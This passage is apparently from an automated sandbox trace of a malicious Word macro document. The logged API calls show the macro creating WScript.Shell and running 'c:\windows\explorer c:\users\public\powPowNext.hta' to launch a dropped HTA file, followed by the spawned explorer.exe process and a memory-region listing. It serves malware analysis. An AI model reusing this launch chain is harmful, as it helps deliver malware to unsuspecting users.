lpMultiByteStr=0x18adf8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlOnEnter", lpUsedDefaultChar=0x0) returned 22 [0116.914] _mbscpy_s (in: _Dst=0x18ad00, _DstSizeInBytes=0x1f, _Src=0x10ee2ada | out: _Dst=0x18ad00) returned 0x0 [0116.914] _mbscpy_s (in: _Dst=0x18ad09, _DstSizeInBytes=0x16, _Src=0x18adf8 | out: _Dst=0x18ad09) returned 0x0 [0116.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlBeforeStoreUpdate", cchWideChar=32, lpMultiByteStr=0x18adf8, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlBeforeStoreUpdate", lpUsedDefaultChar=0x0) returned 32 [0116.914] _mbscpy_s (in: _Dst=0x18ad00, _DstSizeInBytes=0x29, _Src=0x10ee2ada | out: _Dst=0x18ad00) returned 0x0 [0116.914] _mbscpy_s (in: _Dst=0x18ad09, _DstSizeInBytes=0x20, _Src=0x18adf8 | out: _Dst=0x18ad09) returned 0x0 [0116.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlBeforeContentUpdate", cchWideChar=34, lpMultiByteStr=0x18adf8, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlBeforeContentUpdate", lpUsedDefaultChar=0x0) returned 34 [0116.914] _mbscpy_s (in: _Dst=0x18ad00, _DstSizeInBytes=0x2b, _Src=0x10ee2ada | out: _Dst=0x18ad00) returned 0x0 [0116.914] _mbscpy_s (in: _Dst=0x18ad09, _DstSizeInBytes=0x22, _Src=0x18adf8 | out: _Dst=0x18ad09) returned 0x0 [0116.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuildingBlockInsert", cchWideChar=20, lpMultiByteStr=0x18adf8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BuildingBlockInsert", lpUsedDefaultChar=0x0) returned 20 [0116.915] _mbscpy_s (in: _Dst=0x18ad00, _DstSizeInBytes=0x1d, _Src=0x10ee2ada | out: _Dst=0x18ad00) returned 0x0 [0116.915] _mbscpy_s (in: _Dst=0x18ad09, _DstSizeInBytes=0x14, _Src=0x18adf8 | out: _Dst=0x18ad09) returned 0x0 [0118.266] free (_Block=0xd014cf0) [0118.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PowPowNext", cchWideChar=-1, lpMultiByteStr=0xd014cf0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowPowNext", lpUsedDefaultChar=0x0) returned 11 [0118.266] _wfullpath (in: _Buffer=0x18ac40, _Path="C:\\Users\\RDhJ0CNFevzX\\Desktop\\instruct_11.21.doc.vir.doc", _BufferCount=0x104 | out: _Buffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\instruct_11.21.doc.vir.doc") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\instruct_11.21.doc.vir.doc" [0118.267] lstrcmpiW (lpString1="C:\\users\\public\\powPowNext.hta", lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\instruct_11.21.doc.vir.doc") returned -1 [0118.267] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0118.267] wcscpy_s (in: _Destination=0x18aa5e, _SizeInWords=0x105, _Source="C:\\users\\public\\powPowNext.hta" | out: _Destination="C:\\users\\public\\powPowNext.hta") returned 0x0 [0118.267] _wcsicmp (_String1="*\\CC:\\users\\public\\powPowNext.hta", _String2="*\\CC:\\Users\\RDhJ0CNFevzX\\Desktop\\instruct_11.21.doc.vir.doc") returned -2 [0118.267] wcscpy_s (in: _Destination=0xb81d49c, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0118.269] CRetailMalloc_Alloc () returned 0xf1b8670 [0118.269] CRetailMalloc_Free () returned 0x1 [0118.269] CRetailMalloc_Alloc () returned 0xf1b8670 [0118.269] CRetailMalloc_Free () returned 0x1 [0118.269] CRetailMalloc_Alloc () returned 0xf1b9648 [0118.270] CRetailMalloc_Free () returned 0x1 [0118.270] CRetailMalloc_Alloc () returned 0xf1b8b50 [0118.270] CRetailMalloc_Free () returned 0x1 [0118.270] CRetailMalloc_Alloc () returned 0xb8fbc80 [0118.270] CRetailMalloc_Free () returned 0x1 [0118.270] CRetailMalloc_Alloc () returned 0xb8fcf40 [0118.270] CRetailMalloc_Free () returned 0x1 [0118.271] CRetailMalloc_Alloc () returned 0xf22a3e8 [0118.272] CRetailMalloc_Free () returned 0x1 [0118.272] CRetailMalloc_Alloc () returned 0xf22a3e8 [0118.272] CRetailMalloc_Free () returned 0x1 [0118.272] CRetailMalloc_Alloc () returned 0xf19da38 [0118.272] CRetailMalloc_Free () returned 0x1 [0118.273] wcscpy_s (in: _Destination=0xf1bb8b0, _SizeInWords=0x108, _Source="*\\CC:\\users\\public\\powPowNext.hta" | out: _Destination="*\\CC:\\users\\public\\powPowNext.hta") returned 0x0 [0118.273] _wfullpath (in: _Buffer=0x18ac3c, _Path="C:\\users\\public\\powPowNext.hta", _BufferCount=0x104 | out: _Buffer="C:\\users\\public\\powPowNext.hta") returned="C:\\users\\public\\powPowNext.hta" [0118.273] lstrcmpiW (lpString1="C:\\users\\public\\powPowNext.hta", lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\instruct_11.21.doc.vir.doc") returned -1 [0118.348] free (_Block=0xd014cf0) [0118.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PowPowNext", cchWideChar=-1, lpMultiByteStr=0xd014cf0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowPowNext", lpUsedDefaultChar=0x0) returned 11 [0118.383] GetAsyncKeyState (vKey=3) returned 0 [0118.383] CRetailMalloc_Alloc () returned 0xf4e54a0 [0118.384] CRetailMalloc_Realloc () returned 0xf3dd310 [0118.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf0b23de, cbMultiByte=13, lpWideCharStr=0x11180120, cchWideChar=28 | out: lpWideCharStr="wscript.shell") returned 13 [0118.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11022832, cbMultiByte=13, lpWideCharStr=0x1974e4, cchWideChar=14 | out: lpWideCharStr="CreateObject") returned 13 [0118.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee294a, cbMultiByte=13, lpWideCharStr=0x197544, cchWideChar=14 | out: lpWideCharStr="CreateObject") returned 13 [0118.385] SysStringByteLen (bstr="") returned 0x0 [0118.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x197400, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x9b¤", lpUsedDefaultChar=0x0) returned 0 [0118.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf1399bc, cbMultiByte=0, lpWideCharStr=0x11180234, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0118.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1102285e, cbMultiByte=12, lpWideCharStr=0x1974e4, cchWideChar=13 | out: lpWideCharStr="dowYouKarol") returned 12 [0118.393] CRetailMalloc_Realloc () returned 0xf13f240 [0118.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2922, cbMultiByte=12, lpWideCharStr=0x197544, cchWideChar=13 | out: lpWideCharStr="dowYouKarol") returned 12 [0118.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2922, cbMultiByte=12, lpWideCharStr=0x197544, cchWideChar=13 | out: lpWideCharStr="dowYouKarol") returned 12 [0118.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2922, cbMultiByte=12, lpWideCharStr=0x197544, cchWideChar=13 | out: lpWideCharStr="dowYouKarol") returned 12 [0118.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2922, cbMultiByte=12, lpWideCharStr=0x197544, cchWideChar=13 | out: lpWideCharStr="dowYouKarol") returned 12 [0118.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2922, cbMultiByte=12, lpWideCharStr=0x197544, cchWideChar=13 | out: lpWideCharStr="dowYouKarol") returned 12 [0118.393] CRetailMalloc_Alloc () returned 0xb891d60 [0118.393] _mbscpy_s (in: _Dst=0xb891d60, _DstSizeInBytes=0xc, _Src=0x10ee2922 | out: _Dst=0xb891d60) returned 0x0 [0118.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2b96, cbMultiByte=19, lpWideCharStr=0x197554, cchWideChar=20 | out: lpWideCharStr="_B_var_dowYouKarol") returned 19 [0118.394] _mbscpy_s (in: _Dst=0x1975bc, _DstSizeInBytes=0xc, _Src=0x10ee2922 | out: _Dst=0x1975bc) returned 0x0 [0118.394] CRetailMalloc_Free () returned 0x1 [0118.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf0b23fc, cbMultiByte=20, lpWideCharStr=0x111804d2, cchWideChar=42 | out: lpWideCharStr="c:\\windows\\explorer ") returned 20 [0118.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2976, cbMultiByte=6, lpWideCharStr=0x1972f8, cchWideChar=5 | out: lpWideCharStr="exec") returned 0 [0118.394] wcscpy_s (in: _Destination=0xf1fd920, _SizeInWords=0x5, _Source="exec" | out: _Destination="exec") returned 0x0 [0118.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x661eded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0118.395] CRetailMalloc_Realloc () returned 0xf4e54a0 [0118.395] CRetailMalloc_Free () returned 0x1 [0118.396] GetCurrentProcess () returned 0xffffffff [0118.396] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa69c, dwSize=0x14) returned 1 [0118.396] VirtualProtect (in: lpAddress=0xf1fa69c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19740c | out: lpflOldProtect=0x19740c*=0x40) returned 1 [0118.397] GetCurrentProcess () returned 0xffffffff [0118.397] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa69d, dwSize=0x2) returned 1 [0118.397] GetCurrentProcess () returned 0xffffffff [0118.397] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa6bc, dwSize=0x14) returned 1 [0118.397] VirtualProtect (in: lpAddress=0xf1fa6bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19740c | out: lpflOldProtect=0x19740c*=0x40) returned 1 [0118.398] GetCurrentProcess () returned 0xffffffff [0118.398] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa6bd, dwSize=0x2) returned 1 [0118.398] GetCurrentProcess () returned 0xffffffff [0118.398] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa6dc, dwSize=0x14) returned 1 [0118.398] VirtualProtect (in: lpAddress=0xf1fa6dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19740c | out: lpflOldProtect=0x19740c*=0x40) returned 1 [0118.399] GetCurrentProcess () returned 0xffffffff [0118.399] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa6dd, dwSize=0x2) returned 1 [0118.399] SetErrorMode (uMode=0x8001) returned 0x8001 [0118.399] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0118.399] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x65fb0000 [0118.400] SetErrorMode (uMode=0x8001) returned 0x8001 [0118.400] GetProcAddress (hModule=0x65fb0000, lpProcName=0x2cc) returned 0x661a4f87 [0118.403] GetAsyncKeyState (vKey=3) returned 0 [0118.403] GetAsyncKeyState (vKey=3) returned 0 [0118.403] CLSIDFromProgIDEx (in: lpszProgID="wscript.shell", lpclsid=0x197c74 | out: lpclsid=0x197c74*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0118.412] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0118.412] CoCreateInstance (in: rclsid=0x197c74*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x661c8088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x197c44 | out: ppv=0x197c44*=0x8a3b33c) returned 0x0 [0118.498] IUnknown:QueryInterface (in: This=0x8a3b33c, riid=0x661d6898*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x197c48 | out: ppvObject=0x197c48*=0x0) returned 0x80004002 [0118.498] IUnknown:QueryInterface (in: This=0x8a3b33c, riid=0x661d68a8*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x197c4c | out: ppvObject=0x197c4c*=0x0) returned 0x80004002 [0118.499] IUnknown:QueryInterface (in: This=0x8a3b33c, riid=0x661c80a8*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x197c50 | out: ppvObject=0x197c50*=0x8a3b328) returned 0x0 [0118.499] IUnknown:Release (This=0x8a3b33c) returned 0x1 [0118.499] VarBstrCat (in: bstrLeft="c:\\windows\\explorer ", bstrRight="c:\\users\\public\\powPowNext.hta", pbstrResult=0x197c9c | out: pbstrResult=0x197c9c) returned 0x0 [0118.499] IDispatch:GetIDsOfNames (in: This=0x8a3b328, riid=0x661c8098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x197cbc*="exec", cNames=0x1, lcid=0x409, rgDispId=0x197cc0 | out: rgDispId=0x197cc0*=3012) returned 0x0 [0118.503] IDispatch:Invoke (in: This=0x8a3b328, dispIdMember=3012, riid=0x661c8098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x197c94*(rgvarg=([0]=0x197cc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="c:\\windows\\explorer c:\\users\\public\\powPowNext.hta", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x197c74, puArgErr=0x197ca4 | out: pDispParams=0x197c94*(rgvarg=([0]=0x197cc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="c:\\windows\\explorer c:\\users\\public\\powPowNext.hta", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x197c74*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x197ca4*=0x0) returned 0x0 [0118.638] GetAsyncKeyState (vKey=3) returned 0 [0118.638] IUnknown:Release (This=0x8a3b328) returned 0x0 Thread: id = 17 os_tid = 0x60 Thread: id = 45 os_tid = 0x388 Process: id = "2" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x6e674000" os_pid = "0x82c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xec8" cmd_line = "c:\\windows\\explorer c:\\users\\public\\powPowNext.hta" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Documents\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 638 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 639 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 640 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 641 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 642 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 643 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 644 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 645 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 646 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 647 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 648 start_va = 0x7ff6ca9b0000 end_va = 0x7ff6cadf7fff monitored = 0 entry_point = 0x7ff6caa4e090 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 649 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 650 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 693 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 694 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 695 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 696 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 697 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 698 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 700 start_va = 0x7ffc5a2e0000 end_va = 0x7ffc5a358fff monitored = 0 entry_point = 0x7ffc5a2ffb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 702 start_va = 0x7df5ffe40000 end_va = 0x7df5ffebdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 706 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 707 start_va = 0x600000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 708 start_va = 0x7ffc5e1e0000 end_va = 0x7ffc5e2a0fff monitored = 0 entry_point = 0x7ffc5e200da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 709 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 710 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 711 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 712 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 713 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 722 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 723 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 725 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 726 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 729 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 731 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 732 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 733 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 734 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 735 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 736 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 737 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 738 start_va = 0x7ffc5a3a0000 end_va = 0x7ffc5a525fff monitored = 0 entry_point = 0x7ffc5a3ed700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 739 start_va = 0x7ffc5a7b0000 end_va = 0x7ffc5a845fff monitored = 0 entry_point = 0x7ffc5a7d5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 740 start_va = 0x7ffc59dc0000 end_va = 0x7ffc59de1fff monitored = 0 entry_point = 0x7ffc59dc1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 741 start_va = 0x7ffc53100000 end_va = 0x7ffc531b0fff monitored = 0 entry_point = 0x7ffc531108f0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 742 start_va = 0x7ffc59b10000 end_va = 0x7ffc59db7fff monitored = 0 entry_point = 0x7ffc59ba3250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 743 start_va = 0x7ffc59ed0000 end_va = 0x7ffc59fb2fff monitored = 0 entry_point = 0x7ffc59f07da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 744 start_va = 0x7ffc5a950000 end_va = 0x7ffc5aa4ffff monitored = 0 entry_point = 0x7ffc5a990f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 745 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 746 start_va = 0x7ffc5bab0000 end_va = 0x7ffc5badcfff monitored = 0 entry_point = 0x7ffc5bac9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 747 start_va = 0x7ffc5b590000 end_va = 0x7ffc5b5aefff monitored = 0 entry_point = 0x7ffc5b595d30 region_type = 